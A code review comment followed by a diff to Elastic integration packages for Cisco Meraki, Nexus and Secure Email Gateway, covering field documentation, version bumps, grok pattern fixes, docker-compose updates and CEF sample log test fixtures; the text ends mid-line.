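Review bot: The added `uri_parts` processor has no `ignore_failure`, and `url.original` here is the request target taken verbatim from the syslog line, so a malformed URL forwarded by the device fails the processor and routes the whole event through the pipeline's `on_failure` handler instead of leaving `url.original` populated alongside the rest of the event. Adding `ignore_failure: true` to the `uri_parts` processor (the `registered_domain` step already tolerates a missing field with `ignore_missing: true`) keeps the event with the unparsed original. Separately, the expected output for the new sample shows `user_agent.original` as `'Microsoft NCSI'` with the surrounding single quotes, which suggests the `agent=` extraction outside this hunk keeps the quote characters; worth checking.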
@@ -274,6 +274,7 @@ The `cisco_meraki.log` dataset provides events from the configured syslog server | url.query | The query field describes the query string of the request, such as "q=elasticsearch". The `?` is excluded from the query string. If a URL contains no `?`, there is no query field. If there is a `?` but no query, the query field exists with an empty string. The `exists` query can be used to differentiate between the two cases. | keyword | | url.registered_domain | The highest registered url domain, stripped of the subdomain. For example, the registered domain for "foo.example.com" is "example.com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". | keyword | | url.scheme | Scheme of the request, such as "https". Note: The `:` is not part of the scheme. | keyword | +| url.subdomain | The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. | keyword | | url.top_level_domain | The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". 
| keyword | | user.domain | Name of the directory the user is a member of. For example, an LDAP or Active Directory domain name. | keyword | | user.full_name | User's full name, if available. | keyword | diff --git a/packages/cisco_meraki/manifest.yml b/packages/cisco_meraki/manifest.yml index e65192ce8af..fb4e45580f2 100644 --- a/packages/cisco_meraki/manifest.yml +++ b/packages/cisco_meraki/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: cisco_meraki title: Cisco Meraki -version: "1.20.3" +version: "1.21.2" description: Collect logs from Cisco Meraki with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - security conditions: kibana: - version: ^7.17.0 || ^8.0.0 + version: ^8.12.0 screenshots: - src: /img/cisco-meraki-dashboard-1.png title: Cisco Meraki Dashboard diff --git a/packages/cisco_nexus/changelog.yml b/packages/cisco_nexus/changelog.yml index e8028e729ed..66c32546e57 100644 --- a/packages/cisco_nexus/changelog.yml +++ b/packages/cisco_nexus/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.1.1" + changes: + - description: Fix ingest pipeline warnings + type: bugfix + link: https://github.com/elastic/integrations/pulls/9570 +- version: "1.1.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/pipeline_extract_message.yml b/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/pipeline_extract_message.yml index 2d8a3fed2fb..fad1fb71c56 100644 --- a/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/pipeline_extract_message.yml +++ b/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/pipeline_extract_message.yml 
@@ -5,13 +5,13 @@ processors: field: message if: "['IF_DOWN_ADMIN_DOWN','IF_ADMIN_UP','SPEED','IF_DUPLEX','IF_RX_FLOW_CONTROL','IF_TX_FLOW_CONTROL','IF_UP','IF_XCVR_WARNING'].contains(ctx.event?.code.toUpperCase())" patterns: - - '^(?:%{GREEDYDATA}%{SPACE}?(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name} is up in mode %{DATA:cisco_nexus.log.interface.mode}$' - - '^(?:%{GREEDYDATA}%{SPACE}?(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name} is %{GREEDYDATA}$' - - '^(?:%{GREEDYDATA}%{SPACE}?(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, operational speed changed to %{DATA:cisco_nexus.log.operational.speed}$' - - '^(?:%{GREEDYDATA}%{SPACE}?(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, operational duplex mode changed to %{DATA:cisco_nexus.log.operational.duplex_mode}$' - - '^(?:%{GREEDYDATA}%{SPACE}?(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, operational Receive Flow Control state changed to %{DATA:cisco_nexus.log.operational.receive_flow_control_state}$' - - '^(?:%{GREEDYDATA}%{SPACE}?(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, operational Transmit Flow Control state changed to %{DATA:cisco_nexus.log.operational.transmit_flow_control_state}$' - - '^(?:%{GREEDYDATA}%{SPACE}?(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, %{GREEDYDATA}$' + - '^(?:%{GREEDYDATA}%{SPACE}(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name} is up in mode %{DATA:cisco_nexus.log.interface.mode}$' + - '^(?:%{GREEDYDATA}%{SPACE}(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name} is %{GREEDYDATA}$' + - '^(?:%{GREEDYDATA}%{SPACE}(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, operational speed changed to %{DATA:cisco_nexus.log.operational.speed}$' + - '^(?:%{GREEDYDATA}%{SPACE}(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, operational duplex mode changed to %{DATA:cisco_nexus.log.operational.duplex_mode}$' + - 
'^(?:%{GREEDYDATA}%{SPACE}(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, operational Receive Flow Control state changed to %{DATA:cisco_nexus.log.operational.receive_flow_control_state}$' + - '^(?:%{GREEDYDATA}%{SPACE}(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, operational Transmit Flow Control state changed to %{DATA:cisco_nexus.log.operational.transmit_flow_control_state}$' + - '^(?:%{GREEDYDATA}%{SPACE}(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, %{GREEDYDATA}$' ignore_failure: true - grok: description: Extract VSHD_SYSLOG_CONFIG_I, DETECT_MULTIPLE_PEERS, UPDOWN, CFGWRITE_STARTED, LINEPROTO MNEMONIC. diff --git a/packages/cisco_nexus/manifest.yml b/packages/cisco_nexus/manifest.yml index 90909fed993..8aebfffc88b 100644 --- a/packages/cisco_nexus/manifest.yml +++ b/packages/cisco_nexus/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: cisco_nexus title: Cisco Nexus -version: "1.0.1" +version: "1.1.1" description: Collect logs from Cisco Nexus with Elastic Agent. type: integration categories: diff --git a/packages/cisco_secure_email_gateway/_dev/deploy/docker/docker-compose.yml b/packages/cisco_secure_email_gateway/_dev/deploy/docker/docker-compose.yml index 6e22e6f9d1c..48ee8a1c5e2 100644 --- a/packages/cisco_secure_email_gateway/_dev/deploy/docker/docker-compose.yml +++ b/packages/cisco_secure_email_gateway/_dev/deploy/docker/docker-compose.yml 
@@ -7,14 +7,12 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/*.s /var/log/" cisco_secure_email_gateway-log-tcp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9519 -p=tcp /sample_logs/log.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9519 -p=tcp /sample_logs/log.log cisco_secure_email_gateway-log-udp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9520 -p=udp /sample_logs/log.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9520 -p=udp /sample_logs/log.log diff --git a/packages/cisco_secure_email_gateway/changelog.yml b/packages/cisco_secure_email_gateway/changelog.yml index c748c517dd7..72c203bf1e5 100644 --- a/packages/cisco_secure_email_gateway/changelog.yml +++ b/packages/cisco_secure_email_gateway/changelog.yml 
@@ -1,4 +1,24 @@ # newer versions go on top +- version: "1.23.2" + changes: + - description: Fix ingest pipeline warnings + type: bugfix + link: https://github.com/elastic/integrations/pulls/9571 +- version: "1.23.1" + changes: + - description: Improve extraction and parsing of fields for consolidated events. + type: bugfix + link: https://github.com/elastic/integrations/pull/9474 +- version: "1.23.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 +- version: "1.22.2" + changes: + - description: Fix grok if hostname appears before category.name + type: bugfix + link: https://github.com/elastic/integrations/pull/9160 - version: "1.22.1" changes: - description: Changed owners diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-anti-spam.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-anti-spam.log-expected.json index 69365de924a..eb376cd2444 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-anti-spam.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-anti-spam.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "case_id": "72324", @@ -32,7 +32,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "case_id": "15703", @@ -64,7 +64,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "case_id": "15703", 
diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-antivirus.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-antivirus.log-expected.json index 8c1bf52f747..9dfe1999b7e 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-antivirus.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-antivirus.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "CLEAN", @@ -38,7 +38,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "Encrypted", @@ -78,7 +78,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "CXmail/Phish-O", @@ -119,7 +119,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "CXmail/MalPE-HB", @@ -160,7 +160,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "CXmail/MalPE-FL", @@ -201,7 +201,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "CXmail/MalPE-AC", @@ -242,7 +242,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "Mal/DrodRar-AIC", 
@@ -283,7 +283,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "Troj/MSIL-TAR", @@ -324,7 +324,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "Max Files Exceeded", @@ -362,7 +362,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "timed out on message", diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-consolidated-event.log b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-consolidated-event.log index 8e990d26a7d..381e37633b9 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-consolidated-event.log +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-consolidated-event.log 
@@ -11,7 +11,10 @@ <14>Jun 12 14:01:33 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235746AE34E6DD44EB8-CE101C994AA5 ESAMID=5181473 ESAICID=17267358 ESADCID=3036000 endTime=Mon Jun 12 14:01:31 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=1.128.3.4 ESAFriendlyFrom=jean sistin ESAGMVerdict=NEGATIVE startTime=Mon Jun 12 14:01:27 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=jsistin@gmail.com cs1Label=MailPolicy cs1=Test quarantaine utilisateur cs2Label=SenderCountry cs2=United States ESAMFVerdict=MATCH act=DELIVERED cs4Label=ExternalMsgID cs4='' ESAMsgSize=3078 ESAOFVerdict=NEGATIVE duser=fpenigaud@exaprobe.com ESAHeloDomain=mail-oi1-f182.google.com ESAHeloIP=1.128.3.4 cfp1Label=SBRSScore cfp1=3.4 ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'jsistin@gmail.com'}} sourceHostName=mail-oi1-f182.google.com ESASenderGroup=ACCEPTLIST sourceAddress=1.128.3.4 msg='test url' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESATLSOutCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSOutConnStatus=Success ESATLSOutProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=NEGATIVE ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH <14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=E7DEF468022C4EB09683-9A331A42E1F7 ESAMID=54376810 ESAICID=43587623 endTime=Tue Jul 4 06:21:54 2023 ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAAttachmentDetails={'meeting.ics': {'AMP': {'Verdict': 'FILE UNKNOWN', 'fileHash': '17ae79446b4ec3baf161704831970aac49457d32935c6383c2a45aed136a99df'}, 'BodyScanner': {}}} ESAFriendlyFrom=River ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 
16:12:44 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=river@this.example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=New Zealand ESAMFVerdict=MATCH act=DQ ESAFinalActionDetails=Message held temporarily in Delay Quarantine cs4Label=ExternalMsgID cs4='<2403354681.734500.1688449973515.mail.lion@example.com>' ESAMsgSize=18675 ESAOFVerdict=NEGATIVE duser=smith@example.com ESAHeloDomain=vm-lion.dmz ESAHeloIP=89.160.20.128 cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'river@this.example.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@vm-lion.dmz'}} sourceHostName=company.example.com sourceAddress=89.160.20.128 msg='Accept: Cisco - SOLUTIONS' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=FA_PENDING ESAASVerdict=NEGATIVE ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH <14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=30543A3AB9E54FA8AAC1-FB812C95028D ESAMID=238746 ESAICID=435897324 ESADCID=34809573 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.142 ESAFriendlyFrom=Will ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 15:14:29 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=irobot@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=United States ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='' ESAMsgSize=12312 ESAOFVerdict=NEGATIVE duser=alfombra@example.com ESAHeloDomain=mail-q6by9-a42.google.com ESAHeloIP=81.2.69.192 cfp1Label=SBRSScore cfp1=2.7 ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore 
cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'irobot@example.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@mail-q6by9-a42.google.com'}} sourceHostName=mail-q6by9-a42.google.com ESASenderGroup=ACCEPTLIST sourceAddress=81.2.69.192 msg='IE : Crayons' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH -<14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4FEF3A4372664BCCB404-20EE1767D434 ESAMID=786324 ESAICID=35635425 ESADCID=970897 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAFriendlyFrom=Beaches ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 14:42:34 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=westinghouse-thoreau\\=example.com@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=NZ ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='<490b2a15fa4742331779cdaa4e@example.com>' ESAMsgSize=20668 ESAOFVerdict=NEGATIVE duser=thoreau@example.com ESAHeloDomain=example.com ESAHeloIP=89.160.20.112 ESAReplyTo=lane@example.com cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}} sourceHostName=example.com sourceAddress=89.160.20.112 msg=\"Totally not suspicious email subject\" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH +<14>Jul 04 06:21:54 consolidated_event: 
CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4FEF3A4372664BCCB404-20EE1767D434 ESAMID=786324 ESAICID=35635425 ESADCID=970897 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAFriendlyFrom=Beaches ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 14:42:34 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=westinghouse-thoreau\\=example.com@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=NZ ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='<490b2a15fa4742331779cdaa4e@example.com>' ESAMsgSize=20668 ESAOFVerdict=NEGATIVE duser=thoreau@example.com ESAHeloDomain=example.com ESAHeloIP=89.160.20.112 ESAReplyTo=lane@example.com cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}} sourceHostName=example.com sourceAddress=89.160.20.112 msg="Totally not suspicious email subject" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH +<14>Jul 04 06:21:54 test.hostname.co consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4FEF3A4372664BCCB404-20EE1767D434 ESAMID=786324 ESAICID=35635425 ESADCID=970897 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAFriendlyFrom=Beaches ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 14:42:34 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT 
suser=westinghouse-thoreau\\=example.com@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=NZ ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='<490b2a15fa4742331779cdaa4e@example.com>' ESAMsgSize=20668 ESAOFVerdict=NEGATIVE duser=thoreau@example.com ESAHeloDomain=example.com ESAHeloIP=89.160.20.112 ESAReplyTo=lane@example.com cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}} sourceHostName=example.com sourceAddress=89.160.20.112 msg="Totally not suspicious email subject" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH Sep 16 16:56:06 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|15.0.0-104|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235746AE34E6DD44EB8-CE101C994AA5 ESAMID=2348764 ESAICID=435786234 ESADCID=23876232 end=Tue Sep 16 16:56:06 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAFriendlyFrom=Bouncy Castle - No Reply ESAGMVerdict=NEGATIVE start=Tue Sep 16 16:56:04 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=0101016d24913de4eb-28ea32e6-4dad-4943-b6f7-ef0dddbb875d-000000@bounce.com cs1Label=MailPolicy cs1=Exception_support cs2Label=SenderCountry cs2=United States ESAMFVerdict=MATCH act=DELIVERED cs4Label=ExternalMsgID cs4='' ESAMsgSize=3518 ESAOFVerdict=NOT_EVALUATED duser=support@example.com ESAHeloDomain=smtp-out.us-west-1.amazon.com ESAHeloIP=216.160.83.56 cfp1Label=SBRSScore cfp1=3.5 ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Favorable 
ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': '0101016d24913de4eb-28ea32e6-4dad-4943-b6f7-ef0dddbb875d-000000@bounce.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@smtp-out.us-west-1.amazon.com'}} shost=smtp-out.us-west-1.amazon.com ESASenderGroup=ACCEPTLIST src=216.160.83.56 msg='Alert - wireless - APs came up' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESATLSOutCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSOutConnStatus=Success ESATLSOutProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=NEGATIVE ESAAVVerdict=NEGATIVE ESACFVerdict=NOT_EVALUATED Sep 16 16:56:06 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|15.0.0-104|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235746AE34E6DD44EB8-CE101C994AA5 ESAMID=2348764 ESAICID=435786234 ESADCID=23876232 ESAAMPVerdict=SKIPPED ESAAVVerdict=NEGATIVE ESAFriendlyFrom=Bouncy Castle duser=support@example.com ESAHeloDomain=smtp-out.us-west-1.amazon.com ESAHeloIP=216.160.83.56 sourceHostName=example.com ESASenderGroup=UNKNOWNLIST sourceAddress=89.160.20.112 msg='Automatic reply: Your weekend reading from Bouncy Castle' ESAURLDetails={'https://example.com': {'WbrsScore': 3.0}, 'http://www.example.com': {'WbrsScore': 8.9000000000000004}, 'http://schemas.microsoft.com/office': {'WbrsScore': 9.0}} Sep 17 16:56:06 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|15.0.0-104|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235746AE34E6DD44EB8-CE101C994AA5 ESAMID=2348764 ESAICID=435786234 ESADCID=23876232 ESAAMPVerdict=NOT_EVALUATED ESAAVVerdict=NEGATIVE ESAFriendlyFrom="Castle. 
B (Bouncy Castle)" suser=bouncy@castle.com duser=support@example.com ESAHeloDomain=smtp-out.us-west-1.amazon.com ESAHeloIP=216.160.83.56 sourceHostName=unknown ESASenderGroup=RELAYLIST sourceAddress=89.160.20.112 msg='Testing' +<14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Secure Email Gateway Virtual|15.0.1-030|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235AF15AF7E90350F1D-F01741F5D5BE ESAMID=17873886 ESAICID=6274404 ESADCID=1980231 ESAAMPVerdict=NOT_EVALUATED ESAASVerdict=NOT_EVALUATED ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH end=Thu Feb 29 13:24:30 2024 ESADLPVerdict=NO_TRIGGER dvc=81.2.69.144 ESAAttachmentDetails={'image.png': {'BodyScanner': {}}, 'GO EYEWEAR v4.pdf': {'BodyScanner': {}}} ESAFriendlyFrom=Carlos Alberto Cueto ESAGMVerdict=NOT_EVALUATED start=Thu Feb 29 13:24:27 2024 deviceOutboundInterface=MailFlow-Ext deviceDirection=1 ESAMailFlowPolicy=RELAY suser=lclient17@externos.client.test cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=not enabled ESAMFVerdict=MATCH act=DELIVERED cs4Label=ExternalMsgID cs4='' ESAMsgSize=2380198 ESAOFVerdict=NOT_EVALUATED duser=teresa.faria@goeyeweargroup.com ESAHeloDomain=EUR05-DB8-obe.outbound.protection.outlook.com ESAHeloIP=1.128.3.4 cfp1Label=SBRSScore cfp1=not enabled shost=mail-db8eur05lp2105.outbound.protection.outlook.com ESASenderGroup=RELAY_O365 src=216.160.83.56 msg='Presupuesto Go Eyewear' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESATLSOutCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSOutConnStatus=Success ESATLSOutProtocol=TLSv1.2 ESAURLDetails={'https://www.client.test/': {'WbrsScore': 3.0}, 'https://www.client.test/siente-la-inspiracion': {'WbrsScore': 3.0}, 'http://www.client.test/': {'WbrsScore': 3.0, 'AttachmentWithUrl': 'GO EYEWEAR v4.pdf'}, 'www.client.test': {'WbrsScore': 